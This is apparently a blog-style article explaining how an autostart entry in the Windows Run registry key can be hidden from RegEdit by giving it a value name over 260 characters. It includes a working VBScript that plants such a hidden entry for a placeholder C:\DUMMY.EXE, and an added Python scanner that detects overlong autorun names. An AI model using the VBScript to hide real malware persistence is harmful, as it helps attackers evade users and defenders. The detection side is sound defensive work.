Hide Registry Key

The registry key hiding described in this article works by exploiting a vulnerability in REGEDIT: a string value is created whose name is longer than 260 bytes.
This only works against RegEdit and RegEdit32, not against other software such as CCleaner and regutil, which use a buffer longer than 260 bytes and therefore still show the entry. Because RegEdit uses a buffer of exactly 260 bytes, we create a name of 261 or more characters and expect the entry to become invisible. This is a coincidental design flaw rather than a bug. The trick should make our key invisible while the dummy file (which in the real world would be the malware) is still run faithfully at startup. This vulnerability is reportedly being exploited by malware in the wild.

So, below is the VBScript (Visual Basic Script) code that does the trick:

' Build a value name of 12 x 26 = 312 characters, longer than the
' 260-character buffer RegEdit uses when listing value names.
Const Alphabets = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
Dim Shell, my_lengthy_string, i
Set Shell = CreateObject("WScript.Shell")
my_lengthy_string = Alphabets
For i = 0 To 10
    my_lengthy_string = my_lengthy_string & Alphabets
Next
' Write the dummy program as a REG_SZ autostart entry under the long value name.
Shell.RegWrite "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run\" _
    & my_lengthy_string, "C:\DUMMY.EXE", "REG_SZ"
Set Shell = Nothing

The consequence is clearly visible in the snapshot above: the registry key highlighted in red is the one produced by the VBS code posted above. The hidden registry key was caught by the anti-rootkit tool GMER, while the same key is nowhere to be found in RegEdit.
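For the defender's side, here is an added Python example (not part of the original post) that scans a `reg export` style .reg file for autostart value names longer than the 260-character limit the article attributes to RegEdit. The .reg parsing, the list of autostart keys and the sample export with a 312-character name are assumptions constructed for this example.

```python
"""Find autorun value names too long for RegEdit to display.
Added example, not the article's script: it parses a .reg export (as written
by `reg export`) rather than the live registry, so it also runs offline."""
import re

# Display buffer length the article attributes to RegEdit: longer names are not listed.
REGEDIT_NAME_LIMIT = 260
# Autostart keys to check, matched by suffix (a constructed, deliberately short list).
AUTORUN_KEYS = (r"\software\microsoft\windows\currentversion\run",
                r"\software\microsoft\windows\currentversion\runonce")

_SECTION = re.compile(r"^\[(.+)\]$")                # [HKEY_...\Run]
_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')  # "name"=data

def _unescape(text):
    """Strip surrounding quotes and undo .reg backslash escaping."""
    return re.sub(r"\\(.)", r"\1", text.strip('"'))

def find_hidden_autoruns(reg_export, limit=REGEDIT_NAME_LIMIT):
    """Return (key, name_length, data) for autorun values whose name exceeds `limit`."""
    findings, current_key = [], None
    for raw in reg_export.splitlines():
        line = raw.strip()
        section = _SECTION.match(line)
        if section:
            current_key = section.group(1)
            continue
        if current_key is None or not current_key.lower().endswith(AUTORUN_KEYS):
            continue
        value = _VALUE.match(line)
        if value:
            name = _unescape(value.group(1))
            if len(name) > limit:
                findings.append((current_key, len(name), _unescape(value.group(2))))
    return findings

# Constructed sample export: one ordinary entry plus one whose 312-character
# name is built like the article's script (12 copies of the alphabet).
SAMPLE_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run]",
    r'"OneDrive"="C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"',
    '"' + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" * 12 + r'"="C:\\DUMMY.EXE"',
])

if __name__ == "__main__":
    for key, length, data in find_hidden_autoruns(SAMPLE_EXPORT):
        print(f"[!] {key}: {length}-char value name (RegEdit lists at most {REGEDIT_NAME_LIMIT}) -> {data}")
```

On a live system, `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` produces input in this format; the same check can be pointed at exports from any autostart location.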
